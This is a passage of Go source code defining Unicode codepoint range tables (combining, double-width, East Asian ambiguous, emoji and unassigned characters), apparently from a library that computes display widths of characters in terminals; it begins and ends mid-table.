{0x180B, 0x180D}, {0x1885, 0x1886}, {0x18A9, 0x18A9},
{0x1920, 0x192B}, {0x1930, 0x193B}, {0x1A17, 0x1A1B},
{0x1A55, 0x1A5E}, {0x1A60, 0x1A7C}, {0x1A7F, 0x1A7F},
{0x1AB0, 0x1ABE}, {0x1B00, 0x1B04}, {0x1B34, 0x1B44},
{0x1B6B, 0x1B73}, {0x1B80, 0x1B82}, {0x1BA1, 0x1BAD},
{0x1BE6, 0x1BF3}, {0x1C24, 0x1C37}, {0x1CD0, 0x1CD2},
{0x1CD4, 0x1CE8}, {0x1CED, 0x1CED}, {0x1CF2, 0x1CF4},
{0x1CF8, 0x1CF9}, {0x1DC0, 0x1DF5}, {0x1DFB, 0x1DFF},
{0x20D0, 0x20F0}, {0x2CEF, 0x2CF1}, {0x2D7F, 0x2D7F},
{0x2DE0, 0x2DFF}, {0x302A, 0x302F}, {0x3099, 0x309A},
{0xA66F, 0xA672}, {0xA674, 0xA67D}, {0xA69E, 0xA69F},
{0xA6F0, 0xA6F1}, {0xA802, 0xA802}, {0xA806, 0xA806},
{0xA80B, 0xA80B}, {0xA823, 0xA827}, {0xA880, 0xA881},
{0xA8B4, 0xA8C5}, {0xA8E0, 0xA8F1}, {0xA926, 0xA92D},
{0xA947, 0xA953}, {0xA980, 0xA983}, {0xA9B3, 0xA9C0},
{0xA9E5, 0xA9E5}, {0xAA29, 0xAA36}, {0xAA43, 0xAA43},
{0xAA4C, 0xAA4D}, {0xAA7B, 0xAA7D}, {0xAAB0, 0xAAB0},
{0xAAB2, 0xAAB4}, {0xAAB7, 0xAAB8}, {0xAABE, 0xAABF},
{0xAAC1, 0xAAC1}, {0xAAEB, 0xAAEF}, {0xAAF5, 0xAAF6},
{0xABE3, 0xABEA}, {0xABEC, 0xABED}, {0xFB1E, 0xFB1E},
{0xFE00, 0xFE0F}, {0xFE20, 0xFE2F}, {0x101FD, 0x101FD},
{0x102E0, 0x102E0}, {0x10376, 0x1037A}, {0x10A01, 0x10A03},
{0x10A05, 0x10A06}, {0x10A0C, 0x10A0F}, {0x10A38, 0x10A3A},
{0x10A3F, 0x10A3F}, {0x10AE5, 0x10AE6}, {0x11000, 0x11002},
{0x11038, 0x11046}, {0x1107F, 0x11082}, {0x110B0, 0x110BA},
{0x11100, 0x11102}, {0x11127, 0x11134}, {0x11173, 0x11173},
{0x11180, 0x11182}, {0x111B3, 0x111C0}, {0x111CA, 0x111CC},
{0x1122C, 0x11237}, {0x1123E, 0x1123E}, {0x112DF, 0x112EA},
{0x11300, 0x11303}, {0x1133C, 0x1133C}, {0x1133E, 0x11344},
{0x11347, 0x11348}, {0x1134B, 0x1134D}, {0x11357, 0x11357},
{0x11362, 0x11363}, {0x11366, 0x1136C}, {0x11370, 0x11374},
{0x11435, 0x11446}, {0x114B0, 0x114C3}, {0x115AF, 0x115B5},
{0x115B8, 0x115C0}, {0x115DC, 0x115DD}, {0x11630, 0x11640},
{0x116AB, 0x116B7}, {0x1171D, 0x1172B}, {0x11C2F, 0x11C36},
{0x11C38, 0x11C3F}, {0x11C92, 0x11CA7}, {0x11CA9, 0x11CB6},
{0x16AF0, 0x16AF4}, {0x16B30, 0x16B36}, {0x16F51, 0x16F7E},
{0x16F8F, 0x16F92}, {0x1BC9D, 0x1BC9E}, {0x1D165, 0x1D169},
{0x1D16D, 0x1D172}, {0x1D17B, 0x1D182}, {0x1D185, 0x1D18B},
{0x1D1AA, 0x1D1AD}, {0x1D242, 0x1D244}, {0x1DA00, 0x1DA36},
{0x1DA3B, 0x1DA6C}, {0x1DA75, 0x1DA75}, {0x1DA84, 0x1DA84},
{0x1DA9B, 0x1DA9F}, {0x1DAA1, 0x1DAAF}, {0x1E000, 0x1E006},
{0x1E008, 0x1E018}, {0x1E01B, 0x1E021}, {0x1E023, 0x1E024},
{0x1E026, 0x1E02A}, {0x1E8D0, 0x1E8D6}, {0x1E944, 0x1E94A},
{0xE0100, 0xE01EF},
}
var doublewidth = table{
{0x1100, 0x115F}, {0x231A, 0x231B}, {0x2329, 0x232A},
{0x23E9, 0x23EC}, {0x23F0, 0x23F0}, {0x23F3, 0x23F3},
{0x25FD, 0x25FE}, {0x2614, 0x2615}, {0x2648, 0x2653},
{0x267F, 0x267F}, {0x2693, 0x2693}, {0x26A1, 0x26A1},
{0x26AA, 0x26AB}, {0x26BD, 0x26BE}, {0x26C4, 0x26C5},
{0x26CE, 0x26CE}, {0x26D4, 0x26D4}, {0x26EA, 0x26EA},
{0x26F2, 0x26F3}, {0x26F5, 0x26F5}, {0x26FA, 0x26FA},
{0x26FD, 0x26FD}, {0x2705, 0x2705}, {0x270A, 0x270B},
{0x2728, 0x2728}, {0x274C, 0x274C}, {0x274E, 0x274E},
{0x2753, 0x2755}, {0x2757, 0x2757}, {0x2795, 0x2797},
{0x27B0, 0x27B0}, {0x27BF, 0x27BF}, {0x2B1B, 0x2B1C},
{0x2B50, 0x2B50}, {0x2B55, 0x2B55}, {0x2E80, 0x2E99},
{0x2E9B, 0x2EF3}, {0x2F00, 0x2FD5}, {0x2FF0, 0x2FFB},
{0x3000, 0x303E}, {0x3041, 0x3096}, {0x3099, 0x30FF},
{0x3105, 0x312D}, {0x3131, 0x318E}, {0x3190, 0x31BA},
{0x31C0, 0x31E3}, {0x31F0, 0x321E}, {0x3220, 0x3247},
{0x3250, 0x32FE}, {0x3300, 0x4DBF}, {0x4E00, 0xA48C},
{0xA490, 0xA4C6}, {0xA960, 0xA97C}, {0xAC00, 0xD7A3},
{0xF900, 0xFAFF}, {0xFE10, 0xFE19}, {0xFE30, 0xFE52},
{0xFE54, 0xFE66}, {0xFE68, 0xFE6B}, {0xFF01, 0xFF60},
{0xFFE0, 0xFFE6}, {0x16FE0, 0x16FE0}, {0x17000, 0x187EC},
{0x18800, 0x18AF2}, {0x1B000, 0x1B001}, {0x1F004, 0x1F004},
{0x1F0CF, 0x1F0CF}, {0x1F18E, 0x1F18E}, {0x1F191, 0x1F19A},
{0x1F200, 0x1F202}, {0x1F210, 0x1F23B}, {0x1F240, 0x1F248},
{0x1F250, 0x1F251}, {0x1F300, 0x1F320}, {0x1F32D, 0x1F335},
{0x1F337, 0x1F37C}, {0x1F37E, 0x1F393}, {0x1F3A0, 0x1F3CA},
{0x1F3CF, 0x1F3D3}, {0x1F3E0, 0x1F3F0}, {0x1F3F4, 0x1F3F4},
{0x1F3F8, 0x1F43E}, {0x1F440, 0x1F440}, {0x1F442, 0x1F4FC},
{0x1F4FF, 0x1F53D}, {0x1F54B, 0x1F54E}, {0x1F550, 0x1F567},
{0x1F57A, 0x1F57A}, {0x1F595, 0x1F596}, {0x1F5A4, 0x1F5A4},
{0x1F5FB, 0x1F64F}, {0x1F680, 0x1F6C5}, {0x1F6CC, 0x1F6CC},
{0x1F6D0, 0x1F6D2}, {0x1F6EB, 0x1F6EC}, {0x1F6F4, 0x1F6F6},
{0x1F910, 0x1F91E}, {0x1F920, 0x1F927}, {0x1F930, 0x1F930},
{0x1F933, 0x1F93E}, {0x1F940, 0x1F94B}, {0x1F950, 0x1F95E},
{0x1F980, 0x1F991}, {0x1F9C0, 0x1F9C0}, {0x20000, 0x2FFFD},
{0x30000, 0x3FFFD},
}
var ambiguous = table{
{0x00A1, 0x00A1}, {0x00A4, 0x00A4}, {0x00A7, 0x00A8},
{0x00AA, 0x00AA}, {0x00AD, 0x00AE}, {0x00B0, 0x00B4},
{0x00B6, 0x00BA}, {0x00BC, 0x00BF}, {0x00C6, 0x00C6},
{0x00D0, 0x00D0}, {0x00D7, 0x00D8}, {0x00DE, 0x00E1},
{0x00E6, 0x00E6}, {0x00E8, 0x00EA}, {0x00EC, 0x00ED},
{0x00F0, 0x00F0}, {0x00F2, 0x00F3}, {0x00F7, 0x00FA},
{0x00FC, 0x00FC}, {0x00FE, 0x00FE}, {0x0101, 0x0101},
{0x0111, 0x0111}, {0x0113, 0x0113}, {0x011B, 0x011B},
{0x0126, 0x0127}, {0x012B, 0x012B}, {0x0131, 0x0133},
{0x0138, 0x0138}, {0x013F, 0x0142}, {0x0144, 0x0144},
{0x0148, 0x014B}, {0x014D, 0x014D}, {0x0152, 0x0153},
{0x0166, 0x0167}, {0x016B, 0x016B}, {0x01CE, 0x01CE},
{0x01D0, 0x01D0}, {0x01D2, 0x01D2}, {0x01D4, 0x01D4},
{0x01D6, 0x01D6}, {0x01D8, 0x01D8}, {0x01DA, 0x01DA},
{0x01DC, 0x01DC}, {0x0251, 0x0251}, {0x0261, 0x0261},
{0x02C4, 0x02C4}, {0x02C7, 0x02C7}, {0x02C9, 0x02CB},
{0x02CD, 0x02CD}, {0x02D0, 0x02D0}, {0x02D8, 0x02DB},
{0x02DD, 0x02DD}, {0x02DF, 0x02DF}, {0x0300, 0x036F},
{0x0391, 0x03A1}, {0x03A3, 0x03A9}, {0x03B1, 0x03C1},
{0x03C3, 0x03C9}, {0x0401, 0x0401}, {0x0410, 0x044F},
{0x0451, 0x0451}, {0x2010, 0x2010}, {0x2013, 0x2016},
{0x2018, 0x2019}, {0x201C, 0x201D}, {0x2020, 0x2022},
{0x2024, 0x2027}, {0x2030, 0x2030}, {0x2032, 0x2033},
{0x2035, 0x2035}, {0x203B, 0x203B}, {0x203E, 0x203E},
{0x2074, 0x2074}, {0x207F, 0x207F}, {0x2081, 0x2084},
{0x20AC, 0x20AC}, {0x2103, 0x2103}, {0x2105, 0x2105},
{0x2109, 0x2109}, {0x2113, 0x2113}, {0x2116, 0x2116},
{0x2121, 0x2122}, {0x2126, 0x2126}, {0x212B, 0x212B},
{0x2153, 0x2154}, {0x215B, 0x215E}, {0x2160, 0x216B},
{0x2170, 0x2179}, {0x2189, 0x2189}, {0x2190, 0x2199},
{0x21B8, 0x21B9}, {0x21D2, 0x21D2}, {0x21D4, 0x21D4},
{0x21E7, 0x21E7}, {0x2200, 0x2200}, {0x2202, 0x2203},
{0x2207, 0x2208}, {0x220B, 0x220B}, {0x220F, 0x220F},
{0x2211, 0x2211}, {0x2215, 0x2215}, {0x221A, 0x221A},
{0x221D, 0x2220}, {0x2223, 0x2223}, {0x2225, 0x2225},
{0x2227, 0x222C}, {0x222E, 0x222E}, {0x2234, 0x2237},
{0x223C, 0x223D}, {0x2248, 0x2248}, {0x224C, 0x224C},
{0x2252, 0x2252}, {0x2260, 0x2261}, {0x2264, 0x2267},
{0x226A, 0x226B}, {0x226E, 0x226F}, {0x2282, 0x2283},
{0x2286, 0x2287}, {0x2295, 0x2295}, {0x2299, 0x2299},
{0x22A5, 0x22A5}, {0x22BF, 0x22BF}, {0x2312, 0x2312},
{0x2460, 0x24E9}, {0x24EB, 0x254B}, {0x2550, 0x2573},
{0x2580, 0x258F}, {0x2592, 0x2595}, {0x25A0, 0x25A1},
{0x25A3, 0x25A9}, {0x25B2, 0x25B3}, {0x25B6, 0x25B7},
{0x25BC, 0x25BD}, {0x25C0, 0x25C1}, {0x25C6, 0x25C8},
{0x25CB, 0x25CB}, {0x25CE, 0x25D1}, {0x25E2, 0x25E5},
{0x25EF, 0x25EF}, {0x2605, 0x2606}, {0x2609, 0x2609},
{0x260E, 0x260F}, {0x261C, 0x261C}, {0x261E, 0x261E},
{0x2640, 0x2640}, {0x2642, 0x2642}, {0x2660, 0x2661},
{0x2663, 0x2665}, {0x2667, 0x266A}, {0x266C, 0x266D},
{0x266F, 0x266F}, {0x269E, 0x269F}, {0x26BF, 0x26BF},
{0x26C6, 0x26CD}, {0x26CF, 0x26D3}, {0x26D5, 0x26E1},
{0x26E3, 0x26E3}, {0x26E8, 0x26E9}, {0x26EB, 0x26F1},
{0x26F4, 0x26F4}, {0x26F6, 0x26F9}, {0x26FB, 0x26FC},
{0x26FE, 0x26FF}, {0x273D, 0x273D}, {0x2776, 0x277F},
{0x2B56, 0x2B59}, {0x3248, 0x324F}, {0xE000, 0xF8FF},
{0xFE00, 0xFE0F}, {0xFFFD, 0xFFFD}, {0x1F100, 0x1F10A},
{0x1F110, 0x1F12D}, {0x1F130, 0x1F169}, {0x1F170, 0x1F18D},
{0x1F18F, 0x1F190}, {0x1F19B, 0x1F1AC}, {0xE0100, 0xE01EF},
{0xF0000, 0xFFFFD}, {0x100000, 0x10FFFD},
}
var emoji = table{
{0x1F1E6, 0x1F1FF}, {0x1F321, 0x1F321}, {0x1F324, 0x1F32C},
{0x1F336, 0x1F336}, {0x1F37D, 0x1F37D}, {0x1F396, 0x1F397},
{0x1F399, 0x1F39B}, {0x1F39E, 0x1F39F}, {0x1F3CB, 0x1F3CE},
{0x1F3D4, 0x1F3DF}, {0x1F3F3, 0x1F3F5}, {0x1F3F7, 0x1F3F7},
{0x1F43F, 0x1F43F}, {0x1F441, 0x1F441}, {0x1F4FD, 0x1F4FD},
{0x1F549, 0x1F54A}, {0x1F56F, 0x1F570}, {0x1F573, 0x1F579},
{0x1F587, 0x1F587}, {0x1F58A, 0x1F58D}, {0x1F590, 0x1F590},
{0x1F5A5, 0x1F5A5}, {0x1F5A8, 0x1F5A8}, {0x1F5B1, 0x1F5B2},
{0x1F5BC, 0x1F5BC}, {0x1F5C2, 0x1F5C4}, {0x1F5D1, 0x1F5D3},
{0x1F5DC, 0x1F5DE}, {0x1F5E1, 0x1F5E1}, {0x1F5E3, 0x1F5E3},
{0x1F5E8, 0x1F5E8}, {0x1F5EF, 0x1F5EF}, {0x1F5F3, 0x1F5F3},
{0x1F5FA, 0x1F5FA}, {0x1F6CB, 0x1F6CF}, {0x1F6E0, 0x1F6E5},
{0x1F6E9, 0x1F6E9}, {0x1F6F0, 0x1F6F0}, {0x1F6F3, 0x1F6F3},
}
var notassigned = table{
{0x0378, 0x0379}, {0x0380, 0x0383}, {0x038B, 0x038B},
{0x038D, 0x038D}, {0x03A2, 0x03A2}, {0x0530, 0x0530},
{0x0557, 0x0558}, {0x0560, 0x0560}, {0x0588, 0x0588},
{0x058B, 0x058C}, {0x0590, 0x0590}, {0x05C8, 0x05CF},
{0x05EB, 0x05EF}, {0x05F5, 0x05FF}, {0x061D, 0x061D},
{0x070E, 0x070E}, {0x074B, 0x074C}, {0x07B2, 0x07BF},
{0x07FB, 0x07FF}, {0x082E, 0x082F}, {0x083F, 0x083F},
{0x085C, 0x085D}, {0x085F, 0x089F}, {0x08B5, 0x08B5},
{0x08BE, 0x08D3}, {0x0984, 0x0984}, {0x098D, 0x098E},
{0x0991, 0x0992}, {0x09A9, 0x09A9}, {0x09B1, 0x09B1},
{0x09B3, 0x09B5}, {0x09BA, 0x09BB}, {0x09C5, 0x09C6},
{0x09C9, 0x09CA}, {0x09CF, 0x09D6}, {0x09D8, 0x09DB},
{0x09DE, 0x09DE}, {0x09E4, 0x09E5}, {0x09FC, 0x0A00},
{0x0A04, 0x0A04}, {0x0A0B, 0x0A0E}, {0x0A11, 0x0A12},
{0x0A29, 0x0A29}, {0x0A31, 0x0A31}, {0x0A34, 0x0A34},
{0x0A37, 0x0A37}, {0x0A3A, 0x0A3B}, {0x0A3D, 0x0A3D},
{0x0A43, 0x0A46}, {0x0A49, 0x0A4A}, {0x0A4E, 0x0A50},
{0x0A52, 0x0A58}, {0x0A5D, 0x0A5D}, {0x0A5F, 0x0A65},
{0x0A76, 0x0A80}, {0x0A84, 0x0A84}, {0x0A8E, 0x0A8E},
{0x0A92, 0x0A92}, {0x0AA9, 0x0AA9}, {0x0AB1, 0x0AB1},
{0x0AB4, 0x0AB4}, {0x0ABA, 0x0ABB}, {0x0AC6, 0x0AC6},
{0x0ACA, 0x0ACA}, {0x0ACE, 0x0ACF}, {0x0AD1, 0x0ADF},
{0x0AE4, 0x0AE5}, {0x0AF2, 0x0AF8}, {0x0AFA, 0x0B00},
{0x0B04, 0x0B04}, {0x0B0D, 0x0B0E}, {0x0B11, 0x0B12},
{0x0B29, 0x0B29}, {0x0B31, 0x0B31}, {0x0B34, 0x0B34},
{0x0B3A, 0x0B3B}, {0x0B45, 0x0B46}, {0x0B49, 0x0B4A},
{0x0B4E, 0x0B55}, {0x0B58, 0x0B5B}, {0x0B5E, 0x0B5E},
{0x0B64, 0x0B65}, {0x0B78, 0x0B81}, {0x0B84, 0x0B84},
{0x0B8B, 0x0B8D}, {0x0B91, 0x0B91}, {0x0B96, 0x0B98},
{0x0B9B, 0x0B9B}, {0x0B9D, 0x0B9D}, {0x0BA0, 0x0BA2},
{0x0BA5, 0x0BA7}, {0x0BAB, 0x0BAD}, {0x0BBA, 0x0BBD},
{0x0BC3, 0x0BC5}, {0x0BC9, 0x0BC9}, {0x0BCE, 0x0BCF},
{0x0BD1, 0x0BD6}, {0x0BD8, 0x0BE5}, {0x0BFB, 0x0BFF},
{0x0C04, 0x0C04}, {0x0C0D, 0x0C0D}, {0x0C11, 0x0C11},
{0x0C29, 0x0C29}, {0x0C3A, 0x0C3C}, {0x0C45, 0x0C45},
{0x0C49, 0x0C49}, {0x0C4E, 0x0C54}, {0x0C57, 0x0C57},
{0x0C5B, 0x0C5F}, {0x0C64, 0x0C65}, {0x0C70, 0x0C77},
{0x0C84, 0x0C84}, {0x0C8D, 0x0C8D}, {0x0C91, 0x0C91},
{0x0CA9, 0x0CA9}, {0x0CB4, 0x0CB4}, {0x0CBA, 0x0CBB},
{0x0CC5, 0x0CC5}, {0x0CC9, 0x0CC9}, {0x0CCE, 0x0CD4},
{0x0CD7, 0x0CDD}, {0x0CDF, 0x0CDF}, {0x0CE4, 0x0CE5},
{0x0CF0, 0x0CF0}, {0x0CF3, 0x0D00}, {0x0D04, 0x0D04},
{0x0D0D, 0x0D0D}, {0x0D11, 0x0D11}, {0x0D3B, 0x0D3C},
{0x0D45, 0x0D45}, {0x0D49, 0x0D49}, {0x0D50, 0x0D53},
{0x0D64, 0x0D65}, {0x0D80, 0x0D81}, {0x0D84, 0x0D84},
{0x0D97, 0x0D99}, {0x0DB2, 0x0DB2}, {0x0DBC, 0x0DBC},
{0x0DBE, 0x0DBF}, {0x0DC7, 0x0DC9}, {0x0DCB, 0x0DCE},
{0x0DD5, 0x0DD5}, {0x0DD7, 0x0DD7}, {0x0DE0, 0x0DE5},
{0x0DF0, 0x0DF1}, {0x0DF5, 0x0E00}, {0x0E3B, 0x0E3E},
{0x0E5C, 0x0E80}, {0x0E83, 0x0E83}, {0x0E85, 0x0E86},
{0x0E89, 0x0E89}, {0x0E8B, 0x0E8C}, {0x0E8E, 0x0E93},
{0x0E98, 0x0E98}, {0x0EA0, 0x0EA0}, {0x0EA4, 0x0EA4},
{0x0EA6, 0x0EA6}, {0x0EA8, 0x0EA9}, {0x0EAC, 0x0EAC},
{0x0EBA, 0x0EBA}, {0x0EBE, 0x0EBF}, {0x0EC5, 0x0EC5},
{0x0EC7, 0x0EC7}, {0x0ECE, 0x0ECF}, {0x0EDA, 0x0EDB},
{0x0EE0, 0x0EFF}, {0x0F48, 0x0F48}, {0x0F6D, 0x0F70},
{0x0F98, 0x0F98}, {0x0FBD, 0x0FBD}, {0x0FCD, 0x0FCD},
{0x0FDB, 0x0FFF}, {0x10C6, 0x10C6}, {0x10C8, 0x10CC},
{0x10CE, 0x10CF}, {0x1249, 0x1249}, {0x124E, 0x124F},
{0x1257, 0x1257}, {0x1259, 0x1259}, {0x125E, 0x125F},
{0x1289, 0x1289}, {0x128E, 0x128F}, {0x12B1, 0x12B1},
{0x12B6, 0x12B7}, {0x12BF, 0x12BF}, {0x12C1, 0x12C1},
{0x12C6, 0x12C7}, {0x12D7, 0x12D7}, {0x1311, 0x1311},
{0x1316, 0x1317}, {0x135B, 0x135C}, {0x137D, 0x137F},
{0x139A, 0x139F}, {0x13F6, 0x13F7}, {0x13FE, 0x13FF},
{0x169D, 0x169F}, {0x16F9, 0x16FF}, {0x170D, 0x170D},
{0x1715, 0x171F}, {0x1737, 0x173F}, {0x1754, 0x175F},
{0x176D, 0x176D}, {0x1771, 0x1771}, {0x1774, 0x177F},
{0x17DE, 0x17DF}, {0x17EA, 0x17EF}, {0x17FA, 0x17FF},
{0x180F, 0x180F}, {0x181A, 0x181F}, {0x1878, 0x187F},
{0x18AB, 0x18AF}, {0x18F6, 0x18FF}, {0x191F, 0x191F},
{0x192C, 0x192F}, {0x193C, 0x193F}, {0x1941, 0x1943},
{0x196E, 0x196F}, {0x1975, 0x197F}, {0x19AC, 0x19AF},
{0x19CA, 0x19CF}, {0x19DB, 0x19DD}, {0x1A1C, 0x1A1D},
{0x1A5F, 0x1A5F}, {0x1A7D, 0x1A7E}, {0x1A8A, 0x1A8F},
{0x1A9A, 0x1A9F}, {0x1AAE, 0x1AAF}, {0x1ABF, 0x1AFF},
{0x1B4C, 0x1B4F}, {0x1B7D, 0x1B7F}, {0x1BF4, 0x1BFB},
{0x1C38, 0x1C3A}, {0x1C4A, 0x1C4C}, {0x1C89, 0x1CBF},
{0x1CC8, 0x1CCF}, {0x1CF7, 0x1CF7}, {0x1CFA, 0x1CFF},
{0x1DF6, 0x1DFA}, {0x1F16, 0x1F17}, {0x1F1E, 0x1F1F},
{0x1F46, 0x1F47}, {0x1F4E, 0x1F4F}, {0x1F58, 0x1F58},
{0x1F5A, 0x1F5A}, {0x1F5C, 0x1F5C}, {0x1F5E, 0x1F5E},
{0x1F7E, 0x1F7F}, {0x1FB5, 0x1FB5}, {0x1FC5, 0x1FC5},
{0x1FD4, 0x1FD5}, {0x1FDC, 0x1FDC}, {0x1FF0, 0x1FF1},
{0x1FF5, 0x1FF5}, {0x1FFF, 0x1FFF}, {0x2065, 0x2065},
{0x2072, 0x2073}, {0x208F, 0x208F}, {0x209D, 0x209F},
{0x20BF, 0x20CF}, {0x20F1, 0x20FF}, {0x218C, 0x218F},
{0x23FF, 0x23FF}, {0x2427, 0x243F}, {0x244B, 0x245F},
{0x2B74, 0x2B75}, {0x2B96, 0x2B97}, {0x2BBA, 0x2BBC},
{0x2BC9, 0x2BC9}, {0x2BD2, 0x2BEB}, {0x2BF0, 0x2BFF},
{0x2C2F, 0x2C2F}, {0x2C5F, 0x2C5F}, {0x2CF4, 0x2CF8},
{0x2D26, 0x2D26}, {0x2D28, 0x2D2C}, {0x2D2E, 0x2D2F},
{0x2D68, 0x2D6E}, {0x2D71, 0x2D7E}, {0x2D97, 0x2D9F},
{0x2DA7, 0x2DA7}, {0x2DAF, 0x2DAF}, {0x2DB7, 0x2DB7},
{0x2DBF, 0x2DBF}, {0x2DC7, 0x2DC7}, {0x2DCF, 0x2DCF},
{0x2DD7, 0x2DD7}, {0x2DDF, 0x2DDF}, {0x2E45, 0x2E7F},
{0x2E9A, 0x2E9A}, {0x2EF4, 0x2EFF}, {0x2FD6, 0x2FEF},
{0x2FFC, 0x2FFF}, {0x3040, 0x3040}, {0x3097, 0x3098},
{0x3100, 0x3104}, {0x312E, 0x3130}, {0x318F, 0x318F},
{0x31BB, 0x31BF}, {0x31E4, 0x31EF}, {0x321F, 0x321F},
{0x32FF, 0x32FF}, {0x4DB6, 0x4DBF}, {0x9FD6, 0x9FFF},
{0xA48D, 0xA48F}, {0xA4C7, 0xA4CF}, {0xA62C, 0xA63F},
{0xA6F8, 0xA6FF}, {0xA7AF, 0xA7AF}, {0xA7B8, 0xA7F6},
{0xA82C, 0xA82F}, {0xA83A, 0xA83F}, {0xA878, 0xA87F},
{0xA8C6, 0xA8CD}, {0xA8DA, 0xA8DF}, {0xA8FE, 0xA8FF},
{0xA954, 0xA95E}, {0xA97D, 0xA97F}, {0xA9CE, 0xA9CE},
{0xA9DA, 0xA9DD}, {0xA9FF, 0xA9FF}, {0xAA37, 0xAA3F},
{0xAA4E, 0xAA4F}, {0xAA5A, 0xAA5B}, {0xAAC3, 0xAADA},
{0xAAF7, 0xAB00}, {0xAB07, 0xAB08}, {0xAB0F, 0xAB10},
{0xAB17, 0xAB1F}, {0xAB27, 0xAB27}, {0xAB2F, 0xAB2F},
{0xAB66, 0xAB6F}, {0xABEE, 0xABEF}, {0xABFA, 0xABFF},
{0xD7A4, 0xD7AF}, {0xD7C7, 0xD7CA}, {0xD7FC, 0xD7FF},
{0xFA6E, 0xFA6F}, {0xFADA, 0xFAFF}, {0xFB07, 0xFB12},
{0xFB18, 0xFB1C}, {0xFB37, 0xFB37}, {0xFB3D, 0xFB3D},
{0xFB3F, 0xFB3F}, {0xFB42, 0xFB42}, {0xFB45, 0xFB45},
{0xFBC2, 0xFBD2}, {0xFD40, 0xFD4F}, {0xFD90, 0xFD91},
{0xFDC8, 0xFDEF}, {0xFDFE, 0xFDFF}, {0xFE1A, 0xFE1F},
{0xFE53, 0xFE53}, {0xFE67, 0xFE67}, {0xFE6C, 0xFE6F},
{0xFE75, 0xFE75}, {0xFEFD, 0xFEFE}, {0xFF00, 0xFF00},
{0xFFBF, 0xFFC1}, {0xFFC8, 0xFFC9}, {0xFFD0, 0xFFD1},
{0xFFD8, 0xFFD9}, {0xFFDD, 0xFFDF}, {0xFFE7, 0xFFE7},
{0xFFEF, 0xFFF8}, {0xFFFE, 0xFFFF}, {0x1000C, 0x1000C},
{0x10027, 0x10027}, {0x1003B, 0x1003B}, {0x1003E, 0x1003E},
{0x1004E, 0x1004F}, {0x1005E, 0x1007F}, {0x100FB, 0x100FF},
{0x10103, 0x10106}, {0x10134, 0x10136}, {0x1018F, 0x1018F},
{0x1019C, 0x1019F}, {0x101A1, 0x101CF}, {0x101FE, 0x1027F},
{0x1029D, 0x1029F}, {0x102D1, 0x102DF}, {0x102FC, 0x102FF},
{0x10324, 0x1032F}, {0x1034B, 0x1034F}, {0x1037B, 0x1037F},
{0x1039E, 0x1039E}, {0x103C4, 0x103C7}, {0x103D6, 0x103FF},
{0x1049E, 0x1049F}, {0x104AA, 0x104AF}, {0x104D4, 0x104D7},
{0x104FC, 0x104FF}, {0x10528, 0x1052F}, {0x10564, 0x1056E},
{0x10570, 0x105FF}, {0x10737, 0x1073F}, {0x10756, 0x1075F},
{0x10768, 0x107FF}, {0x10806, 0x10807}, {0x10809, 0x10809},
{0x10836, 0x10836}, {0x10839, 0x1083B}, {0x1083D, 0x1083E},
{0x10856, 0x10856}, {0x1089F, 0x108A6}, {0x108B0, 0x108DF},
{0x108F3, 0x108F3}, {0x108F6, 0x108FA}, {0x1091C, 0x1091E},
{0x1093A, 0x1093E}, {0x10940, 0x1097F}, {0x109B8, 0x109BB},
{0x109D0, 0x109D1}, {0x10A04, 0x10A04}, {0x10A07, 0x10A0B},
{0x10A14, 0x10A14}, {0x10A18, 0x10A18}, {0x10A34, 0x10A37},
{0x10A3B, 0x10A3E}, {0x10A48, 0x10A4F}, {0x10A59, 0x10A5F},
{0x10AA0, 0x10ABF}, {0x10AE7, 0x10AEA}, {0x10AF7, 0x10AFF},
{0x10B36, 0x10B38}, {0x10B56, 0x10B57}, {0x10B73, 0x10B77},
{0x10B92, 0x10B98}, {0x10B9D, 0x10BA8}, {0x10BB0, 0x10BFF},
{0x10C49, 0x10C7F}, {0x10CB3, 0x10CBF}, {0x10CF3, 0x10CF9},
{0x10D00, 0x10E5F}, {0x10E7F, 0x10FFF}, {0x1104E, 0x11051},
{0x11070, 0x1107E}, {0x110C2, 0x110CF}, {0x110E9, 0x110EF},
{0x110FA, 0x110FF}, {0x11135, 0x11135}, {0x11144, 0x1114F},
{0x11177, 0x1117F}, {0x111CE, 0x111CF}, {0x111E0, 0x111E0},
{0x111F5, 0x111FF}, {0x11212, 0x11212}, {0x1123F, 0x1127F},
{0x11287, 0x11287}, {0x11289, 0x11289}, {0x1128E, 0x1128E},
{0x1129E, 0x1129E}, {0x112AA, 0x112AF}, {0x112EB, 0x112EF},
{0x112FA, 0x112FF}, {0x11304, 0x11304}, {0x1130D, 0x1130E},
{0x11311, 0x11312}, {0x11329, 0x11329}, {0x11331, 0x11331},
{0x11334, 0x11334}, {0x1133A, 0x1133B}, {0x11345, 0x11346},
{0x11349, 0x1134A}, {0x1134E, 0x1134F}, {0x11351, 0x11356},
{0x11358, 0x1135C}, {0x11364, 0x11365}, {0x1136D, 0x1136F},
{0x11375, 0x113FF}, {0x1145A, 0x1145A}, {0x1145C, 0x1145C},
{0x1145E, 0x1147F}, {0x114C8, 0x114CF}, {0x114DA, 0x1157F},
{0x115B6, 0x115B7}, {0x115DE, 0x115FF}, {0x11645, 0x1164F},
{0x1165A, 0x1165F}, {0x1166D, 0x1167F}, {0x116B8, 0x116BF},
{0x116CA, 0x116FF}, {0x1171A, 0x1171C}, {0x1172C, 0x1172F},
{0x11740, 0x1189F}, {0x118F3, 0x118FE}, {0x11900, 0x11ABF},
{0x11AF9, 0x11BFF}, {0x11C09, 0x11C09}, {0x11C37, 0x11C37},
{0x11C46, 0x11C4F}, {0x11C6D, 0x11C6F}, {0x11C90, 0x11C91},
{0x11CA8, 0x11CA8}, {0x11CB7, 0x11FFF}, {0x1239A, 0x123FF},
{0x1246F, 0x1246F}, {0x12475, 0x1247F}, {0x12544, 0x12FFF},
{0x1342F, 0x143FF}, {0x14647, 0x167FF}, {0x16A39, 0x16A3F},
{0x16A5F, 0x16A5F}, {0x16A6A, 0x16A6D}, {0x16A70, 0x16ACF},
{0x16AEE, 0x16AEF}, {0x16AF6, 0x16AFF}, {0x16B46, 0x16B4F},
{0x16B5A, 0x16B5A}, {0x16B62, 0x16B62}, {0x16B78, 0x16B7C},
{0x16B90, 0x16EFF}, {0x16F45, 0x16F4F}, {0x16F7F, 0x16F8E},
{0x16FA0, 0x16FDF}, {0x16FE1, 0x16FFF}, {0x187ED, 0x187FF},
{0x18AF3, 0x1AFFF}, {0x1B002, 0x1BBFF}, {0x1BC6B, 0x1BC6F},
{0x1BC7D, 0x1BC7F}, {0x1BC89, 0x1BC8F}, {0x1BC9A, 0x1BC9B},
{0x1BCA4, 0x1CFFF}, {0x1D0F6, 0x1D0FF}, {0x1D127, 0x1D128},
